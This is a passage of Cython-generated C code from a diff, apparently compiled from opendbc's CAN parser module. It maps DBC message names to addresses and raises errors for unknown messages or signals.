__Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_12 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_11, __pyx_t_10}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_12, 1+__pyx_t_12); + __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 53, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":52 + * msg_name_to_address[name] = msg.address + * msg_address_to_signals[msg.address] = set() + * for sig in msg.sigs: # <<<<<<<<<<<<<< + * msg_address_to_signals[msg.address].add(sig.name.decode("utf8")) + * + */ + } + + /* "opendbc/can/parser_pyx.pyx":55 + * msg_address_to_signals[msg.address].add(sig.name.decode("utf8")) + * + * self.address_to_msg_name[msg.address] = name # <<<<<<<<<<<<<< + * self.vl[msg.address] = {} + * self.vl[name] = self.vl[msg.address] + */ + __pyx_t_3 = __pyx_convert_string_from_py_std__in_string(__pyx_v_name); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 55, __pyx_L1_error) + (__pyx_cur_scope->__pyx_v_self->address_to_msg_name[__pyx_v_msg.address]) = __pyx_t_3; + + /* "opendbc/can/parser_pyx.pyx":56 + * + * self.address_to_msg_name[msg.address] = name + * self.vl[msg.address] = {} # <<<<<<<<<<<<<< + * self.vl[name] = self.vl[msg.address] + * self.vl_all[msg.address] = {} + */ + __pyx_t_2 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 56, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (unlikely(__pyx_cur_scope->__pyx_v_self->vl == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(0, 56, __pyx_L1_error) + } + __pyx_t_4 = __Pyx_PyInt_From_uint32_t(__pyx_v_msg.address); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 56, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (unlikely((PyDict_SetItem(__pyx_cur_scope->__pyx_v_self->vl, __pyx_t_4, __pyx_t_2) < 0))) __PYX_ERR(0, 56, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":57 + * self.address_to_msg_name[msg.address] = name + * self.vl[msg.address] = {} + * self.vl[name] = self.vl[msg.address] # <<<<<<<<<<<<<< + * self.vl_all[msg.address] = {} + * self.vl_all[name] = self.vl_all[msg.address] + */ + if (unlikely(__pyx_cur_scope->__pyx_v_self->vl == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(0, 57, __pyx_L1_error) + } + __pyx_t_2 = __Pyx_PyInt_From_uint32_t(__pyx_v_msg.address); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 57, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyDict_GetItem(__pyx_cur_scope->__pyx_v_self->vl, __pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 57, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + if (unlikely(__pyx_cur_scope->__pyx_v_self->vl == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(0, 57, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__pyx_cur_scope->__pyx_v_self->vl, __pyx_v_name, __pyx_t_4) < 0))) __PYX_ERR(0, 57, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "opendbc/can/parser_pyx.pyx":58 + * self.vl[msg.address] = {} + * self.vl[name] = self.vl[msg.address] + * self.vl_all[msg.address] = {} # <<<<<<<<<<<<<< + * self.vl_all[name] = self.vl_all[msg.address] + * self.ts_nanos[msg.address] = {} + */ + __pyx_t_4 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 58, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (unlikely(__pyx_cur_scope->__pyx_v_self->vl_all == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(0, 58, __pyx_L1_error) + } + __pyx_t_2 = __Pyx_PyInt_From_uint32_t(__pyx_v_msg.address); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 58, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (unlikely((PyDict_SetItem(__pyx_cur_scope->__pyx_v_self->vl_all, __pyx_t_2, __pyx_t_4) < 0))) __PYX_ERR(0, 58, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "opendbc/can/parser_pyx.pyx":59 + * self.vl[name] = self.vl[msg.address] + * self.vl_all[msg.address] = {} + * self.vl_all[name] = self.vl_all[msg.address] # <<<<<<<<<<<<<< + * self.ts_nanos[msg.address] = {} + * self.ts_nanos[name] = self.ts_nanos[msg.address] + */ + if (unlikely(__pyx_cur_scope->__pyx_v_self->vl_all == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(0, 59, __pyx_L1_error) + } + __pyx_t_4 = __Pyx_PyInt_From_uint32_t(__pyx_v_msg.address); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 59, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 = __Pyx_PyDict_GetItem(__pyx_cur_scope->__pyx_v_self->vl_all, __pyx_t_4); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 59, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(__pyx_cur_scope->__pyx_v_self->vl_all == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(0, 59, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__pyx_cur_scope->__pyx_v_self->vl_all, __pyx_v_name, __pyx_t_2) < 0))) __PYX_ERR(0, 59, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":60 + * self.vl_all[msg.address] = {} + * self.vl_all[name] = self.vl_all[msg.address] + * self.ts_nanos[msg.address] = {} # <<<<<<<<<<<<<< + * self.ts_nanos[name] = self.ts_nanos[msg.address] + * + */ + __pyx_t_2 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 60, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (unlikely(__pyx_cur_scope->__pyx_v_self->ts_nanos == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(0, 60, __pyx_L1_error) + } + __pyx_t_4 = __Pyx_PyInt_From_uint32_t(__pyx_v_msg.address); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 60, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (unlikely((PyDict_SetItem(__pyx_cur_scope->__pyx_v_self->ts_nanos, __pyx_t_4, __pyx_t_2) < 0))) __PYX_ERR(0, 60, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":61 + * self.vl_all[name] = self.vl_all[msg.address] + * self.ts_nanos[msg.address] = {} + * self.ts_nanos[name] = self.ts_nanos[msg.address] # <<<<<<<<<<<<<< + * + * # Convert message names into addresses + */ + if (unlikely(__pyx_cur_scope->__pyx_v_self->ts_nanos == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(0, 61, __pyx_L1_error) + } + __pyx_t_2 = __Pyx_PyInt_From_uint32_t(__pyx_v_msg.address); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 61, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyDict_GetItem(__pyx_cur_scope->__pyx_v_self->ts_nanos, __pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 61, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + if (unlikely(__pyx_cur_scope->__pyx_v_self->ts_nanos == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(0, 61, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__pyx_cur_scope->__pyx_v_self->ts_nanos, __pyx_v_name, __pyx_t_4) < 0))) __PYX_ERR(0, 61, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + + /* "opendbc/can/parser_pyx.pyx":64 + * + * # Convert message names into addresses + * for i in range(len(signals)): # <<<<<<<<<<<<<< + * s = signals[i] + * address = s[1] if isinstance(s[1], numbers.Number) else msg_name_to_address.get(s[1]) + */ + __pyx_t_13 = PyObject_Length(__pyx_v_signals); if (unlikely(__pyx_t_13 == ((Py_ssize_t)-1))) __PYX_ERR(0, 64, __pyx_L1_error) + __pyx_t_14 = __pyx_t_13; + for (__pyx_t_5 = 0; __pyx_t_5 < __pyx_t_14; __pyx_t_5+=1) { + __pyx_v_i = __pyx_t_5; + + /* "opendbc/can/parser_pyx.pyx":65 + * # Convert message names into addresses + * for i in range(len(signals)): + * s = signals[i] # <<<<<<<<<<<<<< + * address = s[1] if isinstance(s[1], numbers.Number) else msg_name_to_address.get(s[1]) + * if address not in msg_address_to_signals: + */ + __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_signals, __pyx_v_i, std::vector ::size_type, 0, __Pyx_PyInt_FromSize_t, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_XDECREF_SET(__pyx_v_s, __pyx_t_4); + __pyx_t_4 = 0; + + /* "opendbc/can/parser_pyx.pyx":66 + * for i in range(len(signals)): + * s = signals[i] + * address = s[1] if isinstance(s[1], numbers.Number) else msg_name_to_address.get(s[1]) # <<<<<<<<<<<<<< + * if address not in msg_address_to_signals: + * raise RuntimeError(f"could not find message {repr(s[1])} in DBC {self.dbc_name}") + */ + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_s, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 66, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GetModuleGlobalName(__pyx_t_10, __pyx_n_s_numbers); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 66, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __pyx_t_11 = __Pyx_PyObject_GetAttrStr(__pyx_t_10, __pyx_n_s_Number); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 66, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + __pyx_t_1 = PyObject_IsInstance(__pyx_t_2, __pyx_t_11); if (unlikely(__pyx_t_1 == ((int)-1))) __PYX_ERR(0, 66, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + if (__pyx_t_1) { + __pyx_t_11 = __Pyx_GetItemInt(__pyx_v_s, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 66, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __pyx_t_4 = __pyx_t_11; + __pyx_t_11 = 0; + } else { + __pyx_t_11 = __Pyx_GetItemInt(__pyx_v_s, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 66, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __pyx_t_2 = __Pyx_PyDict_GetItemDefault(__pyx_v_msg_name_to_address, __pyx_t_11, Py_None); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 66, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __pyx_t_4 = __pyx_t_2; + __pyx_t_2 = 0; + } + __Pyx_XDECREF_SET(__pyx_v_address, __pyx_t_4); + __pyx_t_4 = 0; + + /* "opendbc/can/parser_pyx.pyx":67 + * s = signals[i] + * address = s[1] if isinstance(s[1], numbers.Number) else msg_name_to_address.get(s[1]) + * if address not in msg_address_to_signals: # <<<<<<<<<<<<<< + * raise RuntimeError(f"could not find message {repr(s[1])} in DBC {self.dbc_name}") + * if s[0] not in msg_address_to_signals[address]: + */ + __pyx_t_1 = (__Pyx_PyDict_ContainsTF(__pyx_v_address, __pyx_v_msg_address_to_signals, Py_NE)); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(0, 67, __pyx_L1_error) + if (unlikely(__pyx_t_1)) { + + /* "opendbc/can/parser_pyx.pyx":68 + * address = s[1] if isinstance(s[1], numbers.Number) else msg_name_to_address.get(s[1]) + * if address not in msg_address_to_signals: + * raise RuntimeError(f"could not find message {repr(s[1])} in DBC {self.dbc_name}") # <<<<<<<<<<<<<< + * if s[0] not in msg_address_to_signals[address]: + * raise RuntimeError(f"could not find signal {repr(s[0])} in {repr(s[1])}, DBC {self.dbc_name}") + */ + __pyx_t_4 = PyTuple_New(4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_15 = 0; + __pyx_t_16 = 127; + __Pyx_INCREF(__pyx_kp_u_could_not_find_message); + __pyx_t_15 += 23; + __Pyx_GIVEREF(__pyx_kp_u_could_not_find_message); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_kp_u_could_not_find_message); + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_s, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_11 = PyObject_Repr(__pyx_t_2); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_FormatSimple(__pyx_t_11, __pyx_empty_unicode); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __pyx_t_16 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_2) > __pyx_t_16) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_2) : __pyx_t_16; + __pyx_t_15 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_2); + __pyx_t_2 = 0; + __Pyx_INCREF(__pyx_kp_u_in_DBC); + __pyx_t_15 += 8; + __Pyx_GIVEREF(__pyx_kp_u_in_DBC); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_kp_u_in_DBC); + __pyx_t_2 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_cur_scope->__pyx_v_self->dbc_name); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_11 = __Pyx_PyObject_FormatSimple(__pyx_t_2, __pyx_empty_unicode); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_16 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_11) > __pyx_t_16) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_11) : __pyx_t_16; + __pyx_t_15 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_11); + __Pyx_GIVEREF(__pyx_t_11); + PyTuple_SET_ITEM(__pyx_t_4, 3, __pyx_t_11); + __pyx_t_11 = 0; + __pyx_t_11 = __Pyx_PyUnicode_Join(__pyx_t_4, 4, __pyx_t_15, __pyx_t_16); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_CallOneArg(__pyx_builtin_RuntimeError, __pyx_t_11); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(0, 68, __pyx_L1_error) + + /* "opendbc/can/parser_pyx.pyx":67 + * s = signals[i] + * address = s[1] if isinstance(s[1], numbers.Number) else msg_name_to_address.get(s[1]) + * if address not in msg_address_to_signals: # <<<<<<<<<<<<<< + * raise RuntimeError(f"could not find message {repr(s[1])} in DBC {self.dbc_name}") + * if s[0] not in msg_address_to_signals[address]: + */ + } + + /* "opendbc/can/parser_pyx.pyx":69 + * if address not in msg_address_to_signals: + * raise RuntimeError(f"could not find message {repr(s[1])} in DBC {self.dbc_name}") + * if s[0] not in msg_address_to_signals[address]: # <<<<<<<<<<<<<< + * raise RuntimeError(f"could not find signal {repr(s[0])} in {repr(s[1])}, DBC {self.dbc_name}") + * + */ + __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_s, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 69, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_11 = __Pyx_PyDict_GetItem(__pyx_v_msg_address_to_signals, __pyx_v_address); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 69, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __pyx_t_1 = (__Pyx_PySequence_ContainsTF(__pyx_t_4, __pyx_t_11, Py_NE)); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(0, 69, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + if (unlikely(__pyx_t_1)) { + + /* "opendbc/can/parser_pyx.pyx":70 + * raise RuntimeError(f"could not find message {repr(s[1])} in DBC {self.dbc_name}") + * if s[0] not in msg_address_to_signals[address]: + * raise RuntimeError(f"could not find signal {repr(s[0])} in {repr(s[1])}, DBC {self.dbc_name}") # <<<<<<<<<<<<<< + * + * signals[i] = (s[0], address) + */ + __pyx_t_11 = PyTuple_New(6); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __pyx_t_15 = 0; + __pyx_t_16 = 127; + __Pyx_INCREF(__pyx_kp_u_could_not_find_signal); + __pyx_t_15 += 22; + __Pyx_GIVEREF(__pyx_kp_u_could_not_find_signal); + PyTuple_SET_ITEM(__pyx_t_11, 0, __pyx_kp_u_could_not_find_signal); + __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_s, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 = PyObject_Repr(__pyx_t_4); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_FormatSimple(__pyx_t_2, __pyx_empty_unicode); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_16 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_4) > __pyx_t_16) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_4) : __pyx_t_16; + __pyx_t_15 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_11, 1, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u_in); + __pyx_t_15 += 4; + __Pyx_GIVEREF(__pyx_kp_u_in); + PyTuple_SET_ITEM(__pyx_t_11, 2, __pyx_kp_u_in); + __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_s, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 = PyObject_Repr(__pyx_t_4); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_FormatSimple(__pyx_t_2, __pyx_empty_unicode); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_16 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_4) > __pyx_t_16) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_4) : __pyx_t_16; + __pyx_t_15 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_11, 3, __pyx_t_4); + __pyx_t_4 = 0; + __Pyx_INCREF(__pyx_kp_u_DBC); + __pyx_t_15 += 6; + __Pyx_GIVEREF(__pyx_kp_u_DBC); + PyTuple_SET_ITEM(__pyx_t_11, 4, __pyx_kp_u_DBC); + __pyx_t_4 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_cur_scope->__pyx_v_self->dbc_name); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 = __Pyx_PyObject_FormatSimple(__pyx_t_4, __pyx_empty_unicode); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_16 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_2) > __pyx_t_16) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_2) : __pyx_t_16; + __pyx_t_15 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_11, 5, __pyx_t_2); + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyUnicode_Join(__pyx_t_11, 6, __pyx_t_15, __pyx_t_16); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __pyx_t_11 = __Pyx_PyObject_CallOneArg(__pyx_builtin_RuntimeError, __pyx_t_2); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_Raise(__pyx_t_11, 0, 0, 0); + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __PYX_ERR(0, 70, __pyx_L1_error) + + /* "opendbc/can/parser_pyx.pyx":69 + * if address not in msg_address_to_signals: + * raise RuntimeError(f"could not find message {repr(s[1])} in DBC {self.dbc_name}") + * if s[0] not in msg_address_to_signals[address]: # <<<<<<<<<<<<<< + * raise RuntimeError(f"could not find signal {repr(s[0])} in {repr(s[1])}, DBC {self.dbc_name}") + * + */ + } + + /* "opendbc/can/parser_pyx.pyx":72 + * raise RuntimeError(f"could not find signal {repr(s[0])} in {repr(s[1])}, DBC {self.dbc_name}") + * + * signals[i] = (s[0], address) # <<<<<<<<<<<<<< + * + * for i in range(len(checks)): + */ + __pyx_t_11 = __Pyx_GetItemInt(__pyx_v_s, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_11); + PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_11); + __Pyx_INCREF(__pyx_v_address); + __Pyx_GIVEREF(__pyx_v_address); + PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_address); + __pyx_t_11 = 0; + if (unlikely((__Pyx_SetItemInt(__pyx_v_signals, __pyx_v_i, __pyx_t_2, std::vector ::size_type, 0, __Pyx_PyInt_FromSize_t, 0, 0, 1) < 0))) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + + /* "opendbc/can/parser_pyx.pyx":74 + * signals[i] = (s[0], address) + * + * for i in range(len(checks)): # <<<<<<<<<<<<<< + * c = checks[i] + * if not isinstance(c[0], numbers.Number): + */ + __pyx_t_13 = PyObject_Length(__pyx_v_checks); if (unlikely(__pyx_t_13 == ((Py_ssize_t)-1))) __PYX_ERR(0, 74, __pyx_L1_error) + __pyx_t_14 = __pyx_t_13; + for (__pyx_t_5 = 0; __pyx_t_5 < __pyx_t_14; __pyx_t_5+=1) { + __pyx_v_i = __pyx_t_5; + + /* "opendbc/can/parser_pyx.pyx":75 + * + * for i in range(len(checks)): + * c = checks[i] # <<<<<<<<<<<<<< + * if not isinstance(c[0], numbers.Number): + * if c[0] not in msg_name_to_address: + */ + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_checks, __pyx_v_i, std::vector ::size_type, 0, __Pyx_PyInt_FromSize_t, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 75, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF_SET(__pyx_v_c, __pyx_t_2); + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":76 + * for i in range(len(checks)): + * c = checks[i] + * if not isinstance(c[0], numbers.Number): # <<<<<<<<<<<<<< + * if c[0] not in msg_name_to_address: + * print(msg_name_to_address) + */ + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_c, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 76, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GetModuleGlobalName(__pyx_t_11, __pyx_n_s_numbers); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 76, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_11, __pyx_n_s_Number); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 76, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __pyx_t_1 = PyObject_IsInstance(__pyx_t_2, __pyx_t_4); if (unlikely(__pyx_t_1 == ((int)-1))) __PYX_ERR(0, 76, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_17 = (!__pyx_t_1); + if (__pyx_t_17) { + + /* "opendbc/can/parser_pyx.pyx":77 + * c = checks[i] + * if not isinstance(c[0], numbers.Number): + * if c[0] not in msg_name_to_address: # <<<<<<<<<<<<<< + * print(msg_name_to_address) + * raise RuntimeError(f"could not find message {repr(c[0])} in DBC {self.dbc_name}") + */ + __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_c, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 77, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_17 = (__Pyx_PyDict_ContainsTF(__pyx_t_4, __pyx_v_msg_name_to_address, Py_NE)); if (unlikely((__pyx_t_17 < 0))) 